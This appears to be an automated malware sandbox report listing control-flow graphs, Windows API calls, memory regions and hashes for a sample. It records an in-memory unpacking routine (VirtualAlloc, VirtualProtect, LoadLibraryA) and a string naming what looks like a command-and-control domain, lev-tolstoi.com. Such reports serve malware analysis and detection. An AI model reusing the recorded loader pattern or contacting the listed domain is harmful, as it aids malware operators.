control_flow_graph 547 40cff3-40d003 548 40d010-40d03a 547->548 548->548 549 40d03c-40d06f call 408660 call 4361e0 548->549 554 40d070-40d0b1 549->554 554->554 555 40d0b3-40d0ff 554->555 556 40d100-40d157 555->556 556->556 557 40d159-40d163 556->557 558 40d165-40d168 557->558 559 40d17b-40d189 557->559 560 40d170-40d179 558->560 561 40d18b-40d18f 559->561 562 40d19d 559->562 560->559 560->560 564 40d190-40d199 561->564 563 40d1a0-40d1a8 562->563 565 40d1aa-40d1ab 563->565 566 40d1bb-40d1c9 563->566 564->564 567 40d19b 564->567 568 40d1b0-40d1b9 565->568 569 40d1db-40d29f 566->569 570 40d1cb-40d1cf 566->570 567->563 568->566 568->568 572 40d2a0-40d2e3 569->572 571 40d1d0-40d1d9 570->571 571->569 571->571 572->572 573 40d2e5-40d2fe 572->573 574 40d300-40d330 573->574 574->574 575 40d332-40d34f call 40ba00 574->575 577 40d354-40d36e 575->577
Strings
Memory Dump Source
• Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID: BI$F1177B6615FB90FCF9F1B7136A1E0C5E$ZG$lev-tolstoi.com$3ej$pr
• API String ID: 0-3022268974
• Opcode ID: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
• Instruction ID: f448791ebc0dd286385b88dc6d7820084d2eda887077436efc4f1c5c77796cf1
• Opcode Fuzzy Hash: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
• Instruction Fuzzy Hash: 44A1D6B56007818FD714CF29C590A22BFE2FF96300B1995ADC4D69F7A6DB38E806CB54

Control-flow Graph

control_flow_graph 578 408790-4087a1 call 43a360 581 408970-408972 ExitProcess 578->581 582 4087a7-4087ae call 4336c0 578->582 585 4087b4-4087d8 GetCurrentProcessId GetCurrentThreadId 582->585 586 40896b call 43a930 582->586 588 4087da-4087dc 585->588 589 4087de-408878 SHGetSpecialFolderPathW GetForegroundWindow 585->589 586->581 588->589 590 4088f3-40895f call 409bc0 589->590 591 40887a-4088f1 589->591 590->586 594 408961 call 40cb90 590->594 591->590 596 408966 call 40b9d0 594->596 596->586
APIs
• GetCurrentProcessId.KERNEL32 ref: 004087B4
• GetCurrentThreadId.KERNEL32 ref: 004087BE
• SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 0040885B
• GetForegroundWindow.USER32 ref: 00408870
  • Part of subcall function 0040B9D0: FreeLibrary.KERNEL32(0040896B), ref: 0040B9D6
  • Part of subcall function 0040B9D0: FreeLibrary.KERNEL32 ref: 0040B9F7
• ExitProcess.KERNEL32 ref: 00408972
Memory Dump Source
• Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID: CurrentFreeLibraryProcess$ExitFolderForegroundPathSpecialThreadWindow
• String ID:
• API String ID: 3676751680-0
• Opcode ID: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
• Instruction ID: a67ee57a83d6170df5f07577f929ddf8a699819013d33d30bc43b1fbcecb0360
• Opcode Fuzzy Hash: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
• Instruction Fuzzy Hash: 95417E77F443180BD31CBEB59C9A36AB2969BC4314F0A903F6985AB3D1DD7C5C0552C5

Control-flow Graph

control_flow_graph 620 8b977e-8b9797 621 8b9799-8b979b 620->621 622 8b979d 621->622 623 8b97a2-8b97ae CreateToolhelp32Snapshot 621->623 622->623 624 8b97be-8b97cb Module32First 623->624 625 8b97b0-8b97b6 623->625 626 8b97cd-8b97ce call 8b943d 624->626 627 8b97d4-8b97dc 624->627 625->624 630 8b97b8-8b97bc 625->630 631 8b97d3 626->631 630->621 630->624 631->627
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 008B97A6
• Module32First.KERNEL32(00000000,00000224), ref: 008B97C6
Memory Dump Source
• Source File: 00000000.00000002.2390625549.00000000008B8000.00000040.00000020.00020000.00000000.sdmp, Offset: 008B8000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8b8000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID: CreateFirstModule32SnapshotToolhelp32
• String ID:
• API String ID: 3833638111-0

Control-flow Graph (function 43cb20-43cca8, calling sub_407f60, sub_407f70 and sub_43a9b0; graph data omitted)
Strings
Memory Dump Source
• Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID: InitializeThunk
• String ID: @$ihgf
• API String ID: 2994545307-73152791
Strings
Memory Dump Source
• Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID: h d"
• API String ID: 0-862628183
APIs
• LdrInitializeThunk.NTDLL(0043C978,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043A9DE
Memory Dump Source
• Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID: InitializeThunk
• String ID: ihgf
• API String ID: 2994545307-2948842496
Memory Dump Source
• Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 9189c4c3175398eb84fc80681e1c6dfaa05d9782f835bdc2878a97ad02b88055
                                                                                                                                                                                                                                                                          • Instruction ID: 5bf83162093d809aa6a095f83f940cb60b386281fae2fad957a8694bd2eb5c71
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9189c4c3175398eb84fc80681e1c6dfaa05d9782f835bdc2878a97ad02b88055
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3911E071608341ABD7149F29DD9067FBBE2EBC2354F14AE2CE59253790C630C841CB4A

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 83 249003c-2490047 84 2490049 83->84 85 249004c-2490263 call 2490a3f call 2490e0f call 2490d90 VirtualAlloc 83->85 84->85 100 249028b-2490292 85->100 101 2490265-2490289 call 2490a69 85->101 103 24902a1-24902b0 100->103 105 24902ce-24903c2 VirtualProtect call 2490cce call 2490ce7 101->105 103->105 106 24902b2-24902cc 103->106 112 24903d1-24903e0 105->112 106->103 113 2490439-24904b8 VirtualFree 112->113 114 24903e2-2490437 call 2490ce7 112->114 116 24904be-24904cd 113->116 117 24905f4-24905fe 113->117 114->112 119 24904d3-24904dd 116->119 120 249077f-2490789 117->120 121 2490604-249060d 117->121 119->117 125 24904e3-2490505 LoadLibraryA 119->125 123 249078b-24907a3 120->123 124 24907a6-24907b0 120->124 121->120 126 2490613-2490637 121->126 123->124 127 249086e-24908be LoadLibraryA 124->127 128 24907b6-24907cb 124->128 129 2490517-2490520 125->129 130 2490507-2490515 125->130 131 249063e-2490648 126->131 135 24908c7-24908f9 127->135 132 24907d2-24907d5 128->132 133 2490526-2490547 129->133 130->133 131->120 134 249064e-249065a 131->134 136 2490824-2490833 132->136 137 24907d7-24907e0 132->137 138 249054d-2490550 133->138 134->120 139 2490660-249066a 134->139 141 24908fb-2490901 135->141 142 2490902-249091d 135->142 140 2490839-249083c 136->140 143 24907e2 137->143 144 24907e4-2490822 137->144 145 24905e0-24905ef 138->145 146 2490556-249056b 138->146 147 249067a-2490689 139->147 140->127 148 249083e-2490847 140->148 141->142 143->136 144->132 145->119 151 249056d 146->151 152 249056f-249057a 146->152 149 249068f-24906b2 147->149 150 2490750-249077a 147->150 155 2490849 148->155 156 249084b-249086c 148->156 157 24906ef-24906fc 149->157 158 24906b4-24906ed 149->158 150->131 151->145 153 
249059b-24905bb 152->153 154 249057c-2490599 152->154 166 24905bd-24905db 153->166 154->166 155->127 156->140 160 249074b 157->160 161 24906fe-2490748 157->161 158->157 160->147 161->160 166->138
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0249024D
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                                                                          • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                                                          • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                                                          • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                                          • Instruction ID: 399dcb6eb3918c0fda0455d7dbc85658349493339161d9849fa38a55beedf806
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D2525874A01229DFDB64CF58C984BA9BBB1BF09314F1480DAE94DAB351DB30AE95CF14

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 613 43ab0b-43ab1f 614 43ab20-43ab7b 613->614 614->614 615 43ab7d-43abce GetForegroundWindow call 43c7d0 614->615
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 0043AB9F
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ForegroundWindow
                                                                                                                                                                                                                                                                          • String ID: ilmn
                                                                                                                                                                                                                                                                          • API String ID: 2020703349-1560153188
                                                                                                                                                                                                                                                                          • Opcode ID: 8bf5be419e97d4aeba59362ee4405b63177e9ea72d340c76fc1dbd34a7535713
                                                                                                                                                                                                                                                                          • Instruction ID: 381210f78ea322f673374cf03a2ab6eba84d6d5afac1efb59df7821204f613f6
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8bf5be419e97d4aeba59362ee4405b63177e9ea72d340c76fc1dbd34a7535713
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A0115C3BE5A65087D304DB65D806156B293EAC5214F0DD53DC986D770AEF3DDC028286

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 619 40ea11-40eb75 CoInitializeEx * 2
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CoInitializeEx.OLE32(00000000,00000002), ref: 0040EA15
                                                                                                                                                                                                                                                                          • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040EB5C
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Initialize
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2538663250-0
                                                                                                                                                                                                                                                                          • Opcode ID: 828fab947e5c2764a9ce25ea7f9d0b0a3413673922552607edf72b4d8bb17e1e
                                                                                                                                                                                                                                                                          • Instruction ID: 6a516bc968bc721a6a6447d4bb28a67b77a0153a8c52e65a7a5ccdf46234fc14
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 828fab947e5c2764a9ce25ea7f9d0b0a3413673922552607edf72b4d8bb17e1e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B41E8B4D10B40AFD370EF39DA4B7127EB4AB05250F504B2EF9E6866D4E231A4198BD7

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 633 2490e0f-2490e24 SetErrorMode * 2 634 2490e2b-2490e2c 633->634 635 2490e26 633->635 635->634
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • SetErrorMode.KERNELBASE(00000400,?,?,02490223,?,?), ref: 02490E19
                                                                                                                                                                                                                                                                          • SetErrorMode.KERNELBASE(00000000,?,?,02490223,?,?), ref: 02490E1E
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorMode
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2340568224-0
                                                                                                                                                                                                                                                                          • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                                          • Instruction ID: 222b95ba1efed397dc51e845e48fe434b558f4b478ecd050a5280b6dec76a593
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 20D0123514512877DB002A94DC09BCE7F1CDF05B66F008011FB0DD9180C770954046E5
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,0040B65C,00000000,?), ref: 0043A982
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                          • Opcode ID: 2eba5718b67ec1480271e2bf1c34f5bd19b8968588a838e869f4d5b9ea06510f
                                                                                                                                                                                                                                                                          • Instruction ID: 722538be6ec62bdfb2320af1aff19aeee9eb7e72755357ed04131fae2c05cc9a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2eba5718b67ec1480271e2bf1c34f5bd19b8968588a838e869f4d5b9ea06510f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99E0E576414611FBC6001B24BC06B1B3665AF8A721F02183AF440E6115DA38E811859F
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 0043AB9F
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ForegroundWindow
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2020703349-0
                                                                                                                                                                                                                                                                          • Opcode ID: a0dc0220c6c2ddb49d889c1027b5b2c34b58d9f1c75a0e80b2e5e3c572fe071b
                                                                                                                                                                                                                                                                          • Instruction ID: 60e8b0f46bfb036eff5fe615915129b1fb2bd173e47bf556a6606a5c449cc706
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a0dc0220c6c2ddb49d889c1027b5b2c34b58d9f1c75a0e80b2e5e3c572fe071b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 34E08C7EA406008BDB04DF20EC4A5517766B79A305B084039D903C37A6DB3DD816CA49
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040E65A
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InitializeSecurity
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 640775948-0
                                                                                                                                                                                                                                                                          • Opcode ID: e3be36b273c4f5638e7aeec999eac9b187b5e3b3b1c7f84a5c748abd72b271c0
                                                                                                                                                                                                                                                                          • Instruction ID: 1ef2cd84d3f3a248c300a9315f5ba7c079722d57ce9cb5108686e78c00d3b34e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e3be36b273c4f5638e7aeec999eac9b187b5e3b3b1c7f84a5c748abd72b271c0
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03D0C9343C434076F2654718EC57F1432119302F11F701224B323FE2E1C9D07141860C
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(?,00000000,?,004127C7), ref: 00438E8E
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                                                                                                                                          • Opcode ID: 768fcb1c02373f70ae0863a28d25f36a016012181a68bd02bcb189957d430873
                                                                                                                                                                                                                                                                          • Instruction ID: 85901e1c641484a1e9593b863e702362ecf9fc70d5eef9c3d2e46bbe4163b786
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 768fcb1c02373f70ae0863a28d25f36a016012181a68bd02bcb189957d430873
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 63D01235405526EBC6101F24FC06B863A54EF49321F030461B540AF076C734DC908AD8
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(?,00000000), ref: 00438E55
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                          • Opcode ID: bde11014aa9fadb2486ac873e4c51e0b14130d9e3c259129d8d0e778167120a1
                                                                                                                                                                                                                                                                          • Instruction ID: 4c59684187f8c9fc8ebab3782fe1e1f4842940d007367fb0e8ab7bd4dbd8a192
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bde11014aa9fadb2486ac873e4c51e0b14130d9e3c259129d8d0e778167120a1
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A0C0927C142211FBD2211B21AC5EF6B3E38FB83B63F104124F209580B287649011DA6E
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(?,00000000), ref: 00438E55
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                          • Opcode ID: 1129b59f0d67bf13eed9448a42768f07b4682826011a39e0f4462efca5d079f4
                                                                                                                                                                                                                                                                          • Instruction ID: 3dd49d49275fbb255d04589a33f94784ad2ffd24471d3276aa8c957077778349
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1129b59f0d67bf13eed9448a42768f07b4682826011a39e0f4462efca5d079f4
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8AA0223C002200EBC2200B20AC0EF2B3E38FB83B23F000030F00C080B283308000CA2E
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 008B948E
Memory Dump Source
• Source File: 00000000.00000002.2390625549.00000000008B8000.00000040.00000020.00020000.00000000.sdmp, Offset: 008B8000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8b8000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
• Instruction ID: 08e2581c6666edb8aff2781b5caf790452b22b700f1266cea35c3c380732b211
• Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
• Instruction Fuzzy Hash: 93113C79A00208EFDB01DF98C985E98BBF5EF08351F058094FA889B362D771EA50DF84
Strings
Memory Dump Source
• Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID: $!$"$$$%$%$&$($)$*$+$,$-$.$.$.$0$0$1$2$4$4$4$5$6$8$:$;$;$<$=$>$>$?$?$@$B$C$D$D$F$H$J$L$M$N$N$N$O$P$R$T$U$V$X$Z$Z$Z$[$\$\$]$^$^$`$a$b$c$d$e$e$e$e$f$g$h$i$i$j$k$l$l$m$n$o$p$p$r$s$t$t$t$v$v$x$x$z$|$}$~$~$~
• API String ID: 0-1394229784
• Opcode ID: a56254765318387d5ea3dd4d584f94a84871a07d556f59630aa43d509a526f11
• Instruction ID: 78fde7a8102a4a25e3d516c1edb5f9b2f063fdb03dbd0bbcca9d4d838a68c62c
• Opcode Fuzzy Hash: a56254765318387d5ea3dd4d584f94a84871a07d556f59630aa43d509a526f11
• Instruction Fuzzy Hash: 3F22472190D7E9CDEB26C638CC587DDBEA15B56314F0841D9C19D6B3C2C7BA0B89CB26
Strings
Memory Dump Source
• Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID: $!$"$$$%$%$&$($)$*$+$,$-$.$.$.$0$0$1$2$4$4$4$5$6$8$:$;$;$<$=$>$>$?$?$@$B$C$D$D$F$H$J$L$M$N$N$N$O$P$R$T$U$V$X$Z$Z$Z$[$\$\$]$^$^$`$a$b$c$d$e$e$e$e$f$g$h$i$i$j$k$l$l$m$n$o$p$p$r$s$t$t$t$v$v$x$x$z$|$}$~$~$~
• API String ID: 0-1394229784
• Opcode ID: 0ad0ccab371ecf03d36c413c93bc7494f07a7df5888065dda6a46f4b89f4694b
• Instruction ID: 1f4a2e794e7d2c7584ff322526aa11d635a7b7172e91b8163015a43db2eee24c
• Opcode Fuzzy Hash: 0ad0ccab371ecf03d36c413c93bc7494f07a7df5888065dda6a46f4b89f4694b
• Instruction Fuzzy Hash: E422452190C7E9CDEB26C638CC587DDBEA15B56314F1841DDC1996B3C2C7BA0B89CB26
Strings
Memory Dump Source
• Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmp
